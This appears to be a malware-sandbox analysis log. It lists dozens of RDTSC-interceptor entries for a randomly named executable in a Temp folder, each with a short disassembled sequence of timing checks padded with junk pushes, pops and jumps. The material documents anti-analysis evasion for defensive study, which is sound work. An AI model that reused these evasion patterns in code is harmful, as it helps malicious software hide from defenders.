Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D1F1AF second address: D1F1B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D1F1B3 second address: D1F1B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D1F1B9 second address: D1F1BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D1F1BF second address: D1F1D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F58F53CD393h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D1F1D9 second address: D1F1E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D26C65 second address: D26C6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D26C6B second address: D26C7C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 je 00007F58F4C28976h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D24BDB second address: D24BF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F58F53CD396h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D24BF5 second address: D24C28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F58F4C2897Eh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F58F4C28988h 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D24C28 second address: D24C43 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F53CD397h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D251C4 second address: D251C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D251C9 second address: D251D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F58F53CD38Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D251D9 second address: D251F2 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F58F4C28976h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jng 00007F58F4C28976h 0x00000011 jns 00007F58F4C28976h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D2549D second address: D254A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D2578B second address: D25798 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D25D97 second address: D25D9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D25D9F second address: D25DA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D25DA9 second address: D25DAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D25DAD second address: D25DB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D26042 second address: D26051 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F58F53CD386h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D26051 second address: D26057 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D26372 second address: D263AB instructions: 0x00000000 rdtsc 0x00000002 jc 00007F58F53CD386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F58F53CD394h 0x0000000f popad 0x00000010 pushad 0x00000011 push esi 0x00000012 push edi 0x00000013 pop edi 0x00000014 pop esi 0x00000015 jmp 00007F58F53CD392h 0x0000001a push ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D2663B second address: D2663F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D2699F second address: D269A5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D2B871 second address: D2B890 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F58F4C28976h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F58F4C2897Ah 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jnp 00007F58F4C28978h 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D2A99E second address: D2A9A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D2A9A4 second address: D2A9A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D2B138 second address: D2B13D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D2B13D second address: D2B15C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F58F4C28986h 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D37B86 second address: D37B8B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D37B8B second address: D37BAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F58F4C28986h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D35CCA second address: D35CFB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F58F53CD38Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F58F53CD394h 0x00000010 push eax 0x00000011 jnl 00007F58F53CD386h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D35CFB second address: D35D0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007F58F4C28978h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D363A5 second address: D363BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F58F53CD38Fh 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D363BC second address: D363D7 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F58F4C2898Dh 0x00000008 jmp 00007F58F4C28981h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D363D7 second address: D363DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D363DE second address: D363EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a jnc 00007F58F4C28976h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D363EE second address: D363F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D366B2 second address: D366DE instructions: 0x00000000 rdtsc 0x00000002 jl 00007F58F4C28985h 0x00000008 jmp 00007F58F4C2897Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F58F4C28981h 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D366DE second address: D366F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F58F53CD392h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D366F7 second address: D366FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D36859 second address: D36896 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F58F53CD386h 0x0000000a push eax 0x0000000b pop eax 0x0000000c popad 0x0000000d jno 00007F58F53CD392h 0x00000013 push edi 0x00000014 jng 00007F58F53CD386h 0x0000001a push edi 0x0000001b pop edi 0x0000001c pop edi 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F58F53CD38Ch 0x00000024 jg 00007F58F53CD386h 0x0000002a rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D36B49 second address: D36B70 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F58F4C28976h 0x00000008 jne 00007F58F4C28976h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007F58F4C28987h 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D36B70 second address: D36B75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D37994 second address: D37998 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D37998 second address: D379CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jns 00007F58F53CD38Eh 0x0000000e popad 0x0000000f pushad 0x00000010 push edx 0x00000011 jmp 00007F58F53CD392h 0x00000016 push eax 0x00000017 pop eax 0x00000018 pop edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D379CA second address: D379CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D379CE second address: D379E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F53CD38Eh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D35858 second address: D3585C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D3585C second address: D35866 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F58F53CD386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D35866 second address: D3586B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D3586B second address: D35871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D35871 second address: D35877 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D35877 second address: D3587D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D3EEA9 second address: D3EEAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D40711 second address: D40715 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D40715 second address: D40719 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D4AA3D second address: D4AA4F instructions: 0x00000000 rdtsc 0x00000002 jp 00007F58F53CD386h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D4AA4F second address: D4AA53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D4AA53 second address: D4AA7F instructions: 0x00000000 rdtsc 0x00000002 js 00007F58F53CD386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007F58F53CD38Ah 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F58F53CD396h 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D4AA7F second address: D4AAA9 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F58F4C28976h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c jnc 00007F58F4C28978h 0x00000012 push ebx 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007F58F4C2897Ah 0x0000001a pop ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d je 00007F58F4C28976h 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D4C95C second address: D4C966 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F58F53CD386h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D4C966 second address: D4C975 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 ja 00007F58F4C28976h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D4C520 second address: D4C535 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F58F53CD386h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007F58F53CD386h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D4C535 second address: D4C539 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D4C67F second address: D4C68B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D4C68B second address: D4C69C instructions: 0x00000000 rdtsc 0x00000002 jne 00007F58F4C28976h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D4FF9C second address: D4FFA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D4FFA4 second address: D4FFEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b jmp 00007F58F4C28987h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F58F4C28986h 0x0000001a jmp 00007F58F4C2897Eh 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D4FFEF second address: D5000A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F53CD395h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D5000A second address: D50011 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D5246A second address: D52491 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F58F53CD392h 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e jmp 00007F58F53CD38Ch 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D52491 second address: D524AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F4C2897Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F58F4C2897Dh 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D524AF second address: D524D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007F58F53CD386h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F58F53CD399h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D5503C second address: D55053 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F58F4C28983h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D55053 second address: D55064 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F53CD38Bh 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D55064 second address: D5506E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F58F4C28976h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D5506E second address: D550B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F58F53CD38Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push edi 0x0000000d pop edi 0x0000000e jmp 00007F58F53CD397h 0x00000013 jmp 00007F58F53CD393h 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 pop eax 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE RDTSC instruction interceptor: First address: D550B4 second address: D550BE instructions: 0x00000000 rdtsc 0x00000002 jg 00007F58F4C28976h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
